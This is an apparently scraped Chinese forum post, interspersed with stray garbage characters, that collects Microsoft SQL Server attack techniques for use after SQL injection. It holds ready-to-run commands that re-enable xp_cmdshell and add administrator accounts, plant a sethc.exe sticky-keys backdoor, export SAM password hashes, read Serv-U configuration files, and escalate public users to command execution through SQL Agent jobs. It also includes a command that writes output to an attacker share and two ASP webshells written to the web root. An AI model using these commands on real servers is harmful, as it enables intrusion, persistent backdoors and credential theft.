1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
) R) d; g+ |' h. }6 d3 t: `恢复方法:查询分离器连接后,
& W7 r$ f9 Y3 Q# }/ W* t第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int / o/ o0 N, ~# ?4 _- u# S: g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 7 q4 L! f1 h0 f- S( u4 \
然后按F5键命令执行完毕
. h7 z+ E n; `# h @$ _- ~6 G1 l" W$ h9 n4 M
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
* ?& L, L4 a, Q% E$ F8 y* w% @3 h, O恢复方法:查询分离器连接后,
+ n5 A2 {* g H* u0 J第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"7 G6 y: i* Y+ H- P9 o
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! M. \7 }1 y- S' g) h9 D
然后按F5键命令执行完毕+ U" V( P3 z1 U& J* @
& ^/ U9 M" l( K5 {# I" E, [& c. ^3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
$ h3 u- {# G7 O0 y9 r6 n- n恢复方法:查询分离器连接后,
! L2 v- P& ?; [. X% A5 C' A+ Y第一步执行:exec sp_dropextendedproc 'xp_cmdshell'; E/ ^" Y( |, z6 b' Z* G4 k
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' % I- t8 g J/ H1 e* C8 T
然后按F5键命令执行完毕8 Z7 z: t% F( b" `* I
$ W- R" J! }' t# Q( V4 终极方法.
: {& ?3 P9 E1 }+ n5 i X如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! H6 r3 o/ u& o
查询分离器连接后,5 b2 w: E, ]( m h4 O
2000servser系统:- w4 N' H9 M0 |$ a8 |9 F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
9 `- ~. {. F E# _9 u3 W5 c" ^! ?; j0 k* K. W9 ^1 p1 d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
# ]% S/ l0 u) B. Z- o+ Q: k$ `* r/ Y; C" i3 `% Q% D$ b
xp或2003server系统:
& M9 ^& x& M+ h4 h" e# x. r8 Z8 I3 r. P, c7 }$ n! U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'% b ?; H! Q2 ]: k
, x0 T% Y& A1 z! V: V! H! R
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'* B {1 R% R2 ?0 k
7 y) ~: U# i) i5 d ]! p
' T7 z0 x+ ?9 U: H3 [3 o# x% G. K
五个SHIFT
4 z! _5 A+ _, ]declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';7 v. {, Y" m' `0 v" N' H7 g
4 p. l' J9 y$ y; G: f9 `. G* g- q
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
$ R, ^: q- w/ p1 i8 y* a; D& u7 N0 y: e5 d/ {* n1 a% t2 r; y, s
xp_cmdshell执行命令另一种方法+ F& z) T5 E4 o! I; t5 ?( ~9 a, f
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
" Y; s% ~5 \& M) r" v% u- e
' t/ m( o' k% Z! b判断存储扩展是否存在
4 w4 H. e3 F5 N; f4 V! s: S: nSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
/ W2 {: o! j% V+ @' J返回结果为1就OK
' h" }0 r; N4 E- i9 z; n8 K# A4 r
- m$ G: G9 [5 F3 V7 ~; K* W, _0 f
上传xplog70.dll恢复xp_cmdshell语句:
1 O \" G# p% ~. c( d. D t+ Qsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'. B3 g# C, u9 z6 h9 c, o: H5 k
2 q5 w& Z5 ~, X' `) c否则上传xplog7.0.dll
2 O" G2 y1 [, AExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'5 J) p# j! s4 E& Z/ c% R9 o
% w: ?0 p* w5 f* ~: g: a: j! T. U1 k- p, [" O2 [+ c. O3 m
/ H8 e4 w5 E4 N d
首先开启沙盘模式:
# l) T/ X8 \; x# }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1/ `6 `' e1 Z. T
x% u! p/ b. o) w1 ^
然后利用jet.oledb执行系统命令, H r; X3 A- E" l7 y2 \
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
" m$ L: V9 x3 g- g; i返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了& z. D7 S; E" G6 I) ? z( g Y
5 L2 j" [ b6 P1 Q0 f5 N8 o, C( N7 G/ ]+ m& g" B
$ c8 ~" Q5 v) ]
恢复过程sp_addextendedproc 如下: ; v \$ J1 G1 m P/ o( {, p
create procedure sp_addextendedproc --- 1996/08/30 20:13 " O$ y7 g1 e* F4 }' \0 L
@functname nvarchar(517),/* (owner.)name of function to call */ ; n. N" R0 w' F6 Q: m5 _
@dllname varchar(255)/* name of DLL containing function */
: L/ o3 c; U9 Ras $ T+ o( m. l& w
set implicit_transactions off
9 ~2 p7 j* j9 k9 L) [' f/ [! fif @@trancount > 0 1 f D* h8 T; }0 T
begin 2 u; h$ B o9 ~' V1 v- g* T
raiserror(15002,-1,-1,'sp_addextendedproc')
" ^9 [. B$ T6 Preturn (1)
8 I* |+ q$ H4 k/ x" u0 e) i/ Zend
; g1 X+ | m5 E. l; h! C0 vdbcc addextendedproc( @functname, @dllname) 9 n' S; z* m, y n
return (0) -- sp_addextendedproc 2 D! z- W7 Y# D J
GO
/ r/ Y( i& F- V. Q. ^1 u; ~4 A" G/ V- ?
" I- z) ^) h1 c# V
( R( A; ] E, g1 ^9 b; O# k导出管理员密码文件8 n; S1 a( H% V: E& _; Y
sa默认可以读sam键.应该。% p8 K, \- S0 D
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg. J# b% p0 C) J4 c B5 d
net user administrator test$ ]- R ~! s+ Y* a* Q2 D( a/ z
用administrator登陆.
3 C0 M, A# z& F( X+ p9 p用完机器后
3 O, P# U& J0 P8 i, B# [# ~( w. ureg import c:\test.reg
* i$ H( w, z( g/ m5 J根本不用克隆.# W) I5 u3 Z' u$ y: ]
找到对应的sid. 3 c' j2 g" s' d. W, z; I
* E, K/ y& ~2 b Z m
2 z1 k- r! ^/ B; `: ~; x( b9 E
6 _% O- U' _0 c, o# v6 e! S恢复所有存储过程2 n* a; F3 P7 E$ ^
use master 9 Q" g9 U0 N: ^
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
. S4 h& \: L3 m! l, X% Z# \exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 5 J4 v, j8 `$ K- `0 W0 O2 J
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' + \0 E# b, T- t& C9 n
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
, q' i6 H( T- D& j3 bexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
& A" L0 t8 m. ~exec sp_addextendedproc sp_OACreate,'odsole70.dll'
; O% A0 @$ f: e s l) Rexec sp_addextendedproc sp_OADestroy,'odsole70.dll' # c+ R4 ]" A4 o0 ~7 t5 K
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' / ^2 K3 `$ u g
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
& _9 z5 P' R5 X6 m) xexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
4 l M/ ~5 {! v% b2 n* \5 e8 wexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
% |6 n" {3 w( ~exec sp_addextendedproc sp_OAStop,'odsole70.dll'
. F# ]4 A# F8 I- `exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' j2 x g5 Q8 }9 p& ?. ~& b
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 5 D% d- t( R& a3 w, k
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
7 l% d: H8 S0 I* [" Q) _/ l, pexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
$ B' x- A8 m4 L1 \$ _% aexec sp_addextendedproc xp_regread,'xpstar.dll'
. E+ J* v [6 M' H: Uexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
8 \6 ^# k* T; M% w! fexec sp_addextendedproc xp_regwrite,'xpstar.dll' 7 l% i! v$ u/ X7 Y3 F
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
" Z% t+ _" D. q. e
1 `+ H0 H+ K1 ?' U+ g8 w, @) R1 z) i+ _ F$ c4 \: v; _
建立读文件的存储过程
5 `- V2 N7 z5 d2 S9 ?6 \Create proc sp_readTextFile @filename sysname, S. b" x2 G, Y ^
as
5 C& L* c' m3 U/ K, [2 @% n& R. K; B1 T
begin
* S' P7 }. \0 z. ]5 C% f set nocount on 8 q3 \# ?0 z4 S# [) P/ P5 T
Create table #tempfile (line varchar(8000)), |1 E) J8 o) D, D9 x2 F. J
exec ('bulk insert #tempfile from "' + @filename + '"')
) |4 j* ?* s8 r" e select * from #tempfile
' z6 y0 u4 v- P; y6 i drop table #tempfile$ [! O- _8 w/ q2 L
End3 r! \$ u9 G- b1 o$ m! U- ?
" k. I( L% s. X2 K; cexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
2 G* }5 U/ X2 O$ `6 b5 Z% B查看登录用户$ _$ ]/ D! i3 Q2 d! K! L: }
Select * from sysxlogins
- q) m- e; K2 P
3 \& L2 _! |* n( R( K |" T把文件内容读取到表中
" A4 R$ X+ ?- P$ d% M# K/ zBULK INSERT tmp from "c:\test.txt"$ o7 u/ C5 l+ Z+ V9 v
dElete from 表名 清理表里的内容
& O; h9 C* v: u qcreate table b_test(fn nvarchar(4000));建一个表,字段为fn) p% D" @" C8 Q* L: l" {" |
+ r8 N: ?* m6 D2 x; X: j
. { a1 b$ x5 J2 X; |5 s! b加sa用户
" l0 G) H' p. Z- pexec master.dbo.sp_addlogin user,pass;% [, ]5 A( x1 H
exec master.dbo.sp_addsrvrolemember user,sysadmin
6 F& T" b+ r# N4 R% ^' |! ^0 F8 |
, i1 R/ h5 A! l# u1 N
5 x- d$ ~- E- Z! v% i1 M3 F6 m0 l4 k' B4 D
读文件代码- e* D, \: A! |+ c: Y1 `: P, G
declare @o int, @f int, @t int, @ret int
+ y" O. ]7 T, l/ ^- {/ j1 Hdeclare @line varchar(8000)
h0 F6 Y$ q: q, |* x: d0 sexec sp_oacreate 'scripting.filesystemobject', @o out/ f/ g0 R" y" n
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
1 _2 V& h/ o( K( o" m4 Texec @ret = sp_oamethod @f, 'readline', @line out
$ T Q$ u- b1 [" s5 @while( @ret = 0 )# z# q0 d4 i6 H' U. T
begin# [! V% W% n' p- b8 E3 C
print @line: ~% k! H5 T% g
exec @ret = sp_oamethod @f, 'readline', @line out3 a6 f. x9 I t$ B( ~
end
u1 a3 F U2 B z' |; f _. q6 m9 Q
8 d6 ]* ^3 o0 s* T) g写文件代码:
) A& X3 D* w: q& ^2 Ideclare @o int, @f int, @t int, @ret int# B8 b) b; m* r
exec sp_oacreate 'scripting.filesystemobject', @o out
, |3 R( o/ U' l" g$ Z8 ~$ k& Iexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
- h- a$ I% }% `exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》1 n9 ?+ A& ]5 g% j$ k, G
9 h# P; H/ M: R7 n
; b! I; W9 G0 f/ Q- ~( B- P& g! `添加lake2 shell
- @' r8 B/ E4 w/ O" J' C! H w! W# isp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
/ g. t0 q# r) Z% m1 w6 e1 csp_dropextendedproc xp_lake2
) \( H* y9 Q+ c$ z" IEXEC xp_lake2 'net user'0 M1 e. N0 n. k& T/ ?: _0 C( m
1 `, {$ M! N2 D- q/ w9 ~, q! ~% W4 M/ _% F( I
得到硬盘文件信息
l: B* ~. F3 S--参数说明:目录名,目录深度,是否显示文件
! X* s7 `1 g6 F& xexecute master..xp_dirtree 'c:' $ f+ d, l: Q/ e) d! ?! n
execute master..xp_dirtree 'c:',1 1 R9 s& I& O! d& t
execute master..xp_dirtree 'c:',1,1
* w: y! ?& i( k5 i; d% o$ o# k( _- d4 d/ r e! {! M
# D" B: h+ l( j3 n5 u" b8 h6 Z" m读serv-u配置信息
) N N+ U: d3 g% R- f# R. s# s Cexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
' {' F$ h Q$ P( pexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'6 h t/ q9 H7 f9 M; V; z
( p) ?9 a! N* l通过xp_regwrite写SHIFT后门
: ?! x/ D9 J7 |; ? eexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--( I7 b+ j3 ~1 h0 K$ H, c
' U+ Z8 b1 B& M- c; x( n' v* i$ o/ p; W% G1 ^! d. V" p6 V8 M
& {$ K: C7 Y+ _& v( u2 }找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';; Y2 O8 ] Y9 J& K; ~
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
7 p6 E6 `5 S3 v7 w" i1 \- u% n7 G
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
/ s: J" v0 F! y: u" s0 d, f! \3 g1 `% Q
- V" `+ M; v* B2 |' S% i8 e+ L$ C; A: v' R
sql server 2005下开启xp_cmdshell的办法
: p( S: [) c1 ~3 f
) A& q/ r; i- J! AEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;2 `# h R9 J5 F+ t2 ?3 C8 R
- t5 V. @3 G8 k
SQL2005开启'OPENROWSET'支持的方法:$ \* x% j# @! c$ a. B
. B4 r/ p! s' X9 u4 mexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
2 x) @5 k. I8 a, k1 K
- }7 S1 A. ]* \) `# m& F* Q# ~SQL2005开启'sp_oacreate'支持的方法:
. X' N; Q; ^" B* o
0 l9 P3 c/ C9 T0 o" b- k6 Jexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;$ B) S* \7 J, [2 R) c5 v
" K6 B$ H- ?, P
8 H5 \% W2 Q3 c, Z% ?0 W
! |8 K8 R+ [' h$ Q2 a! K* v9 r2 j' ^1 L$ l' W# Y; Y
( y5 w( `+ l% j
! I: I" w: v6 e' x$ W+ O! b6 [) \8 Q4 D/ @9 \" [
, T5 m# ^6 m( M; t7 C1 B3 S( L0 L4 i2 G& f# z
3 s T# {# G( Q; A4 t) r) h
9 X" L+ x8 C% [2 Y; s( d7 }- M* H( i* D- i# {% w; ~" q4 V0 S; y
" I& `4 b4 R P1 ~" A* N( i3 t9 T4 I' r3 T
: i9 Q+ M; L B r5 S
2 o% g' t O& |4 f; |9 c% ^
. _9 S& x- K1 C5 m) @5 `2 e5 z1 a
1 j; S. l% J6 A+ R. k+ o! t/ j
% X H& ^0 k" W3 A
% p9 |' I6 G) A; c1 p8 q
0 ~) L8 ^1 ]! M9 B/ L" }
) M' p) j: v1 c1 l
% f9 p. g8 v$ R4 s, S
: ~! V% i. `# J1 i6 Q/ R2 K以下方面不知道能不能成功暂且留下研究哈:- \$ J' a5 ]. p: B9 s( z e
4)
! o5 b5 A1 z: Y6 fuse msdb; --这儿不要是master哟9 o k$ g8 [. |) `6 r% p5 Y
exec sp_add_job @job_name= czy82 ;
( M+ b6 m- V8 |# F1 ?: {exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
% N% Z2 O. C1 iexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;6 V4 C8 t: [( A8 x, |$ I
exec sp_start_job @job_name= czy82 ;8 D- b$ u* |& J) _* e: P1 r: @& R
Z: ?, ]/ B( G3 s$ h利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以) ~* {* [* q8 d4 v2 \+ U' e
执行tsql语句了.% J, {$ K* D4 z# A4 Q
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名! A" U( Z1 M v% S' V+ [5 l
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)& m8 V/ K/ f" F
net start SQLSERVERAGENT
, q! A6 h1 V% ?# a9 |
( X ]. O' E9 q+ b3 E对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的3 x5 U* Q9 U, Q% {% a! [
USE msdb/ j% X( {& i: I" H2 ~! q
EXEC sp_add_job @job_name = GetSystemOnSQL ,) r4 k4 s% e+ Z+ o* s [& Z0 o
@enabled = 1,
+ T( r* }: {* L8 E+ k@description = This will give a low privileged user access to! Y! G, w2 w/ K$ J7 u& m
xp_cmdshell ,: ~( l. Y! W! H
@delete_level = 1
4 O/ R6 B/ A; U% kEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,) ^4 G8 k g, A R4 u. T- W
@step_name = Exec my sql ," o+ r* P7 W/ a, ~
@subsystem = TSQL ,3 [7 l) @& @* d
@command = exec master..xp_execresultset N select exec; q& m& B. Z4 V' d
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
3 C% T1 r% b8 m3 V3 x+ J+ [EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,5 G( Y$ `* E, G1 U$ w
@server_name = 你的SQL的服务器名
! e, K c, U7 C3 IEXEC sp_start_job @job_name = GetSystemOnSQL
; q; }4 A7 X4 e$ _8 }; |- i5 K6 R2 O* |0 I9 ]- T
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以) X6 P3 }5 Q) x2 u6 E& ^- @
才让我们可以以public执行xp_cmdshell- _3 e: m: W2 z9 H/ z, }
) d% _/ C" ?# D5 d# |, m5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
- `4 e* z; Q/ T/ K在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
9 g# ~: N- {. q
" h; E2 s2 ]+ o; O) n# R4 nUSE msdb
' p7 r' j1 @ `( q: O, P1 hEXEC sp_add_job @job_name = ArbitraryFilecreate ,; @9 B7 C/ z" j6 S( N( q- S3 @
@enabled = 1,& S) m* o2 \+ @, B2 H4 C
@description = This will create a file called c:\sqlafc123.txt ,
! h: q6 H& M# y, e& C4 g@delete_level = 18 X$ h; m- i. y$ f
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
. U' u# w" P6 w$ a9 ]@step_name = SQLAFC ,
, m4 J9 v, `) }4 z@subsystem = TSQL ,: w- U$ V8 ?. ?- F
@command = select hello, this file was created by the SQL Agent. ,
* p# w3 c q( b# j" q5 J0 |& T8 U@output_file_name = c:\sqlafc123.txt 4 i% w) i7 g( y- N
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,6 X4 K, G; y& Z
@server_name = SERVER_NAME
# M5 Q! g8 `) \EXEC sp_start_job @job_name = ArbitraryFilecreate
$ P$ C" k& X% X0 z# ^1 K! T
' `) ^# M- e8 T5 ~如果subsystem选的是:tsql,在生成的文件的头部有如下内容
: B4 g: V9 B7 V1 G& d& W0 Y# S- D! K$ _6 i
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:193 D0 [. t# a" h& H$ r+ {; g
----------------------------------------------0 ?" s) W6 ?+ l
hello, this file was created by the SQL Agent.) ~ ]2 f: Z4 S5 F
+ y& O! s8 Y: O8 R* Y! T$ j
(1 ?????)$ K" i+ |5 s9 e8 p/ O* V, x" N
" [9 i2 O5 S |; o
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员8 {6 ^% F w9 H
命令的vbs文件到启动目录!
) X% R' k% t0 J1 z8 ]9 l* H# ^. I( p, a& L
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)4 ~8 Q. k$ q- k7 u, w2 j
关于sp_MScopyscriptfile 看下面的例子1 `$ N) O+ [0 N: \5 T
declare @command varchar(100)
2 e) \6 G; t; @& v) `% v+ h! Gdeclare @scripfile varchar(200) " l' S- H1 ~* E/ {+ E$ \
set concat_null_yields_null off ; W8 H5 \; H" K3 w) D1 a
select @command= dir c:\ > "\\attackerip\share\dir.txt"
9 `5 K) ^& y. o Nselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
' ^. {. k, _: `% D; l( p& I0 M) Jexec sp_MScopyscriptfile @scripfile , # }1 a3 v. L( k4 p
5 @9 _+ H/ }7 N+ S! i8 \& X这两个东东都还在测试试哟
4 ^2 q5 n" `4 h/ p0 M# y1 [让MSSQL的public用户得到一个本机的web shell , a6 {) a, L* R1 I( e# W. o% I
* A& `3 z- B& f3 \3 w x9 fsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,9 x6 o& B; x& V) T/ ]" E! T" Q
--@query= select <img src=vbscript:msgbox(now())> " n3 X# c M1 E1 |8 Q% [: I) a6 h
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
9 W1 P- f* R$ N- _' O@query= select ' }) R6 H7 } p* _8 Y
<%On Error Resume Next ( o5 U9 }. b* j! D, l
Set oscript = Server.createObject("wscript.SHELL") / o7 l# Z* L T! |/ E5 {
Set oscriptNet = Server.createObject("wscript.NETWORK") 1 I! N$ O. b: d* ?
Set oFileSys = Server.createObject("scripting.FileSystemObject")
9 M6 W0 ~6 t" a; p. O$ D7 L- [5 a; LszCMD = Request.Form(".CMD")
6 X$ U8 r% ~# u& A. k7 TIf (szCMD <>"")Then
& z2 _ K5 T0 `- NszTempFile = "C:\" & oFileSys.GetTempName() $ ^) W0 h& j/ U$ q" W+ v% p- S
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) - a* o- O/ v( A1 o1 J" M. Y
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
" W0 g0 s8 S8 {! D1 Y: D" c: UEnd If %> & y5 `4 s) A4 u$ @
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> + L2 B- h2 A- A' R1 Q
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
. q. x7 L7 D5 A, X& l# A8 k</FORM><RE>
4 j+ O: j1 ]( L0 M* ?4 E<% If (IsObject(oFile))Then * y- @; V' k) B4 ]9 f3 n6 w3 a9 _
On Error Resume Next * U. y4 D. Q7 Q7 R* H! r( ~1 w8 O
Response.Write Server.HTMLEncode(oFile.ReadAll) 0 F9 `1 D: ^+ _% a% J
oFile.Close 5 h, G" b& h1 i$ G7 V
Call oFileSys.deleteFile(szTempFile, True) , c0 m4 B t: {: ^. J8 V! y
End If%> ! d7 }; A! k0 J* S8 X) u
</BODY></HTML>
# h/ B( {$ l- R& I |
发表于 2012-9-15 14:37:30
收藏
支持
反对